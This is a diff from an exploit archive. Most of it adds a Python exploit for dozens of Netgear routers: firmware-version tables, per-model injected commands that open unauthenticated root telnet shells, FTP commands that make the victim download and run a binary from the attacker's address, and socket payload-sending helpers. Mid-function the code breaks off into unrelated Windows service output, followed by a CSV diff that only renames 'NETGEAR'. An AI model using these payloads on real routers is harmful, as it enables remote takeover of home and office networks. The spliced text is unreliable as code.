"V1.5.0.34_10.0.33" : "1.5.0.34", + }, + "WGR614V8" : { + "V1.2.10_21.0.52" : "1.2.10", + "V1.2.10_21.0.52NA" : "1.2.10NA", + "V1.1.24_14.0.43" : "1.1.24", + "V1.1.24_14.0.43NA" : "1.1.24NA", + "V1.1.2_1.0.23" : "1.1.2", + "V1.1.2_1.0.23NA" : "1.1.2NA", + "V1.1.11_6.0.36" : "1.1.11", + "V1.1.11_6.0.36NA" : "1.1.11NA", + "V1.1.1_1.0.20NA" : "1.1.1NA", + "V1.1.20_7.0.37" : "1.1.20", + "V1.1.20_7.0.37NA" : "1.1.20NA", + }, + "WGR614V9" : { + "V1.2.32_43.0.46" : "1.2.32", + "V1.2.32_43.0.46NA" : "1.2.32NA", + "V1.2.30_41.0.44" : "1.2.30", + "V1.2.30_41.0.44NA" : "1.2.30NA", + "V1.2.24_37.0.35" : "1.2.24", + "V1.2.24_37.0.35NA" : "1.2.24NA", + "V1.2.6_18.0.17" : "1.2.6", + "V1.2.6_18.0.17NA" : "1.2.6NA", + "V1.2.2_14.0.13" : "1.2.2", + "V1.2.2_14.0.13NA" : "1.2.2NA", + "V1.0.18_8.0.9PT" : "1.0.18", + "V1.0.18_8.0.9NA" : "1.0.18NA", + "V1.0.15_4.0.3" : "1.0.15", + "V1.0.15_4.0.3NA" : "1.0.15NA", + "V1.0.9_1.0.1NA" : "1.0.9NA", + }, + "WGR614V10" : { + "V1.0.2.66_60.0.90" : "1.0.2.66", + "V1.0.2.66_60.0.90NA" : "1.0.2.66NA", + "V1.0.2.60_60.0.85" : "1.0.2.60", + "V1.0.2.60_60.0.85NA" : "1.0.2.60NA", + "V1.0.2.58_60.0.84NA" : "1.0.2.58NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + }, + "WGT624V4" : { + "V2.0.13_2.0.15NA" : "2.0.13.2", + "V2.0.13_2.0.14" : "2.0.13", + "V2.0.13_2.0.14NA" : "2.0.13NA", + "V2.0.12_2.0.12" : "2.0.12", + "V2.0.12_2.0.12NA" : "2.0.12NA", + "V2.0.6_2.0.6NA" : "2.0.6NA", + }, + "WN2500RP" : { + "V1.0.0.30_1.0.58" : "1.0.0.30", + "V1.0.0.26_1.0.54" : "1.0.0.26", + "V1.0.0.24_1.0.53" : "1.0.0.24", + }, + "WN2500RPV2" : { + "V1.0.1.54_1.0.68" : "1.0.1.54", + "V1.0.1.50_1.0.64" : "1.0.1.50", + "V1.0.1.46_1.0.60" : "1.0.1.46", + "V1.0.1.42_1.0.56" : "1.0.1.42", + "V1.0.0.30_1.0.41" : "1.0.0.30", + }, + "WN3000RP" : { + "V1.0.2.64_1.1.86" : "1.0.2.64", + "V1.0.1.36_1.1.47" : "1.0.1.36", + "V1.0.1.34_1.1.46" : "1.0.1.34", + "V1.0.1.18_1.1.24" : "1.0.1.18", + "V1.0.0.12_1.0.12" : "1.0.0.12", + }, + "WN3100RP" : { + "V1.0.0.20_1.0.22" : "1.0.0.20", + "V1.0.0.16_1.0.20" : "1.0.0.16", + "V1.0.0.14_1.0.19" : "1.0.0.14", + "V1.0.0.6_1.0.12" : "1.0.0.6", + }, + "WN3500RP" : { + "V1.0.0.22_1.0.62" : "1.0.0.22", + "V1.0.0.20_1.0.60" : "1.0.0.20", + "V1.0.0.18_1.0.59" : "1.0.0.18", + "V1.0.0.16_1.0.58" : "1.0.0.16", + "V1.0.0.14_1.0.54" : "1.0.0.14", + "V1.0.0.12_1.0.49" : "1.0.0.12", + }, + "WNCE3001" : { + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.33" : "1.0.0.46", + "V1.0.0.44_1.0.32" : "1.0.0.44", + "V1.0.0.38" : "1.0.0.38", + }, + "WNDR3300" : { + "V1.0.45_1.0.45" : "1.0.45", + "V1.0.45_1.0.45NA" : "1.0.45NA", + "V1.0.29_1.0.29" : "1.0.29", + "V1.0.29_1.0.29NA" : "1.0.29NA", + "V1.0.27_1.0.27NA" : "1.0.27NA", + "V1.0.26_1.0.26" : "1.0.26", + "V1.0.26_1.0.26NA" : "1.0.26NA", + "V1.0.23_1.0.23NA" : "1.0.23NA", + "Version Detection Fail" : "1.0.14", + "Version Detection Fail" : "1.0.14NA", + }, + "WNDR3300V2" : { + "V1.0.0.26_11.0.26NA" : "1.0.0.26", + }, + "WNDR3400" : { + "V1.0.0.52_20.0.60" : "1.0.0.52", + "V1.0.0.50_20.0.59" : "1.0.0.50", + "V1.0.0.38_16.0.48" : "1.0.0.38", + "V1.0.0.34_15.0.42" : "1.0.0.34", + }, + "WNDR3400V2" : { + "V1.0.0.54_1.0.82" : "1.0.0.54", + "V1.0.0.52_1.0.81" : "1.0.0.52", + "V1.0.0.38_1.0.61" : "1.0.0.38", + "V1.0.0.34_1.0.52" : "1.0.0.34", + "V1.0.0.16_1.0.34" : "1.0.0.16", + "V1.0.0.12_1.0.30" : "1.0.0.12", + }, + "WNDR3400V3" : { + "V1.0.1.24_1.0.67" : "1.0.1.24", + "V1.0.1.22_1.0.66" : "1.0.1.22", + "V1.0.1.18_1.0.63" : "1.0.1.18", + "V1.0.1.16_1.0.62" : "1.0.1.16", + "V1.0.1.14_1.0.61" : "1.0.1.14", + "V1.0.1.12_1.0.58" : "1.0.1.12", + "V1.0.1.8_1.0.56" : "1.0.1.8", + "V1.0.1.4_1.0.52" : "1.0.1.4", + "V1.0.1.2_1.0.51" : "1.0.1.2", + "V1.0.0.48_1.0.48" : "1.0.0.48", + "V1.0.0.46_1.0.45" : "1.0.0.46", + "V1.0.0.38_1.0.40" : "1.0.0.38", + "V1.0.0.22_1.0.29" : "1.0.0.22", + "V1.0.0.20_1.0.28" : "1.0.0.20", + }, + "WNDR3700V3" : { + "V1.0.0.42_1.0.33" : "1.0.0.42", + "V1.0.0.38_1.0.31" : "1.0.0.38", + "V1.0.0.36_1.0.30" : "1.0.0.36", + "V1.0.0.30_1.0.27" : "1.0.0.30", + "V1.0.0.22_1.0.17" : "1.0.0.22", + "V1.0.0.18_1.0.14" : "1.0.0.18", + }, + "WNDR4000" : { + "V1.0.2.10_9.1.89" : "1.0.2.10", + "V1.0.2.6_9.1.87" : "1.0.2.6", + "V1.0.2.4_9.1.86" : "1.0.2.4", + "V1.0.2.2_9.1.84" : "1.0.2.2", + "V1.0.0.94_9.1.81" : "1.0.0.94", + "V1.0.0.90_9.1.79" : "1.0.0.90", + "V1.0.0.88_9.1.77" : "1.0.0.88", + "V1.0.0.82_8.0.71" : "1.0.0.82", + "V1.0.0.66_8.0.55" : "1.0.0.66", + }, + "WNDR4500" : { + "V1.0.1.46_1.0.76" : "1.0.1.46", + "V1.0.1.40_1.0.68" : "1.0.1.40", + "V1.0.1.38_1.0.64" : "1.0.1.38", + "V1.0.1.36_1.0.63" : "1.0.1.36", + "V1.0.1.20_1.0.40" : "1.0.1.20", + "V1.0.1.18_1.0.36" : "1.0.1.18", + "V1.0.1.6_1.0.24" : "1.0.1.6", + "V1.0.0.58_1.0.13" : "1.0.0.58", + "V1.0.0.50_1.0.12" : "1.0.0.50", + "V1.0.0.40_1.0.10" : "1.0.0.40", + }, + "WNDR4500V2" : { + "V1.0.0.72_1.0.45" : "1.0.0.72", + "V1.0.0.68_1.0.42" : "1.0.0.68", + "V1.0.0.64_1.0.40" : "1.0.0.64", + "V1.0.0.62_1.0.39" : "1.0.0.62", + "V1.0.0.60_1.0.38" : "1.0.0.60", + "V1.0.0.56_1.0.36" : "1.0.0.56", + "V1.0.0.54_1.0.33" : "1.0.0.54", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.42_1.0.25" : "1.0.0.42", + "V1.0.0.36_1.0.21" : "1.0.0.36", + "V1.0.0.26_1.0.16" : "1.0.0.26", + }, + "WNR834BV2" : { + "V2.1.13_2.1.13" : "2.1.13", + "V2.1.13_2.1.13NA" : "2.1.13NA", + "V2.0.8_2.0.8" : "2.0.8", + "V2.0.8_2.0.8NA" : "2.0.8NA", + "V1.0.32_1.0.32" : "1.0.32", + "V1.0.32_1.0.32NA" : "1.0.32NA", + }, + "WNR1000V3" : { + "V1.0.2.72_60.0.96" : "1.0.2.72", + "V1.0.2.72_60.0.96NA" : "1.0.2.72NA", + "V1.0.2.68_60.0.93" : "1.0.2.68", + "V1.0.2.68_60.0.93NA" : "1.0.2.68NA", + "V1.0.2.62_60.0.87" : "1.0.2.62", + "V1.0.2.62_60.0.87NA" : "1.0.2.62NA", + "V1.0.2.60_60.0.86WW" : "1.0.2.60", + "V1.0.2.60_60.0.86NA" : "1.0.2.60NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.28_52.0.60" : "1.0.2.28", + "V1.0.2.28_52.0.60NA" : "1.0.2.28NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + "V1.0.2.4_39.0.39" : "1.0.2.4", + }, + "WNR2000V2" : { + "V1.2.0.8_36.0.60" : "1.2.0.8", + "V1.2.0.8_36.0.60NA" : "1.2.0.8NA", + "V1.2.0.6_36.0.58" : "1.2.0.6", + "V1.2.0.6_36.0.58NA" : "1.2.0.6NA", + "V1.2.0.4_35.0.57" : "1.2.0.4", + "V1.2.0.4_35.0.57NA" : "1.2.0.4NA", + "V1.0.0.40_32.0.54" : "1.0.0.40", + "V1.0.0.40_32.0.54NA" : "1.0.0.40NA", + "V1.0.0.35_29.0.47" : "1.0.0.35", + "V1.0.0.34_29.0.45" : "1.0.0.34", + "V1.0.0.34_29.0.45NA" : "1.0.0.34NA", + }, + "WNR3500" : { + "V1.0.36_8.0.36NA" : "1.0.36NA", + "V1.0.30_8.0.30" : "1.0.30", + "V1.0.29_8.0.29NA" : "1.0.29NA", + "V1.0.22_6.0.22" : "1.0.22", + "V1.0.22_6.0.22NA" : "1.0.22NA", + "V1.0.15_1.0.15NA" : "1.0.15NA", + "V1.0.10_1.0.10NA" : "1.0.10NA", + }, + "WNR3500V2" : { + "V1.2.2.28_25.0.85" : "1.2.2.28", + "V1.2.2.28_25.0.85NA" : "1.2.2.28NA", + "V1.0.2.14_24.0.74" : "1.0.2.14", + "V1.0.2.14_24.0.74NA" : "1.0.2.14NA", + "V1.0.2.10_23.0.70" : "1.0.2.10NA", + "V1.0.2.10_23.0.70NA" : "1.0.2.10", + "V1.0.0.64_11.0.51" : "1.0.0.64", + "V1.0.0.64_11.0.51NA" : "1.0.0.64NA", + }, + "WNR3500L" : { + "V1.2.2.48_35.0.55NA" : "1.2.2.48NA", + "V1.2.2.44_35.0.53" : "1.2.2.44", + "V1.2.2.44_35.0.53NA" : "1.2.2.44NA", + "V1.2.2.40_34.0.48" : "1.2.2.40", + "V1.2.2.40_34.0.48NA" : "1.2.2.40NA", + "V1.2.2.30_34.0.37" : "1.2.2.30", + "V1.2.2.30_34.0.37NA" : "1.2.2.30NA", + "V1.0.2.50_31.1.25" : "1.0.2.50", + "V1.0.2.50_31.1.25NA" : "1.0.2.50NA", + "V1.0.2.26_30.0.98" : "1.0.2.26", + "V1.0.2.26_30.0.98NA" : "1.0.2.26NA", + "V1.0.0.88_13.0.76" : "1.0.0.88", + "V1.0.0.88_13.0.76NA" : "1.0.0.88NA", + "V1.0.0.86_13.0.75" : "1.0.0.86", + "V1.0.0.86_13.0.75NA" : "1.0.0.86NA", + }, + "WNR3500LV2" : { + "V1.2.0.56_50.0.96" : "1.2.0.56", + "V1.2.0.54_50.0.94" : "1.2.0.54", + "V1.2.0.50_50.0.90" : "1.2.0.50", + "V1.2.0.48_40.0.88" : "1.2.0.48", + "V1.2.0.46_40.0.86" : "1.2.0.46", + "V1.2.0.44_40.0.84" : "1.2.0.44", + "V1.2.0.40_40.0.80" : "1.2.0.40", + "V1.2.0.38_40.0.78" : "1.2.0.38", + "V1.2.0.34_40.0.75" : "1.2.0.34", + "V1.2.0.32_40.0.74" : "1.2.0.32", + "V1.2.0.28_40.0.72" : "1.2.0.28", + "V1.2.0.26_40.0.71" : "1.2.0.26", + "V1.2.0.20_40.0.68" : "1.2.0.20", + "V1.2.0.18_40.0.67" : "1.2.0.18", + "V1.2.0.16_40.0.66" : "1.2.0.16", + "V1.0.0.14_37.0.50" : "1.0.0.14", + "V1.0.0.10" : "1.0.0.10", + }, + "XR300" : { + "V1.0.3.38_10.3.30" : "1.0.3.38", + "V1.0.3.34_10.3.27" : "1.0.3.34", + "V1.0.3.26_10.3.22" : "1.0.3.26", + "V1.0.2.24_10.3.21" : "1.0.2.24", + "V1.0.2.18_10.3.15" : "1.0.2.18", + "V1.0.1.4_10.1.4" : "1.0.1.4", + }, +} + +# The default command, spawns a telnet daemon on TCP port 8888 (or 3333, when 8888 is already used) +default_commands = { + # These devices ask for a password if you don't specify the login program with -l + "AC1450" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "D8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "DC112A" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX6200" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX7000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6200V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6250" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6300V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700V3" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7000" : "/bin/utelnetd -p3333 -l/bin/sh -d", + "R7000P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7100LG" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7850" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "RS400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "XR300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + + # These devices don't need to create the terminal devices files first + "WGT624V4" : "telnetd -p8888 -l/bin/sh", + + # These devices need to create the terminal device files first + "D6220" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D7000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200M" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200V4" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGND3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3800" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6120" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6130" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6150" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "LG2200D" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBM621" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR624GU" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1515" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1516" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBRN3000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MVBR1210C" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V8" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V9" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888", + "WGR614V10" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RPV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3100RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3700V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR1000V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR2000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500L" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500LV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR834BV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + + # On some versions of the EX6100, port 8888 is already used, so use 3333 instead + "EX6100" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p3333 -l/bin/sh", + + # Some devices need different commands based on the version + "WN3000RP" : collections.defaultdict(lambda : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + {"1.0.2.64" : "/usr/sbin/utelnetd -p8888 -l/bin/sh -d"}), + + # The WNR3500/WGT624v4 don't have the device files or mknod, we'll have the victim download it + "WNCE3001" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh", + "WNR3500" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh", +} + +# The default command on these devices needs to download mknod via FTP +ftp_devices = {"WNR3500" : "arm_lsb", "WNCE3001" : "mips_msb"} + +########################################################################### +## Functions ############################################################## +########################################################################### + +def send(ip, port, is_https, payload, keep_open = False): + if is_https: + return send_ssl(ip, port, payload, keep_open) + else: + return send_plain(ip, port, payload, keep_open) + +def send_plain(ip, port, payload, keep_open): + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((ip, port)) + sock.send(payload) + if keep_open: + return sock + sock.close() + +def send_ssl(ip, port, payload, keep_open): + import ssl + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + wrappedSocket = ssl.wrap_socket(sock) + wrappedSocket.connect((ip, port)) + wrappedSocket.send(payload) + if keep_open: + return wrappedSocket + wrappedSocket.close() + +def p32(address, model): + if model in big_endian_devices: + return struct.pack(">I", address) + return struct.pack("wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor" +Svc10StrikeBandMonitor C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe Auto LocalSystem +Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe Auto LocalSystem +Svc10StrikeBMAgent C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe Auto LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 486af450a..cc0ec866d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -940,7 +940,7 @@ id,file,description,date,author,type,platform,port 7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows, 7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows, 7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows, -8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware, +8008,exploits/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware, 8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",dos,hardware, 8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",dos,multiple, 8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,dos,windows, @@ -952,7 +952,7 @@ id,file,description,date,author,type,platform,port 8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,dos,multiple, 8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",dos,windows, 8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,dos,windows, -8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware, +8106,exploits/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware, 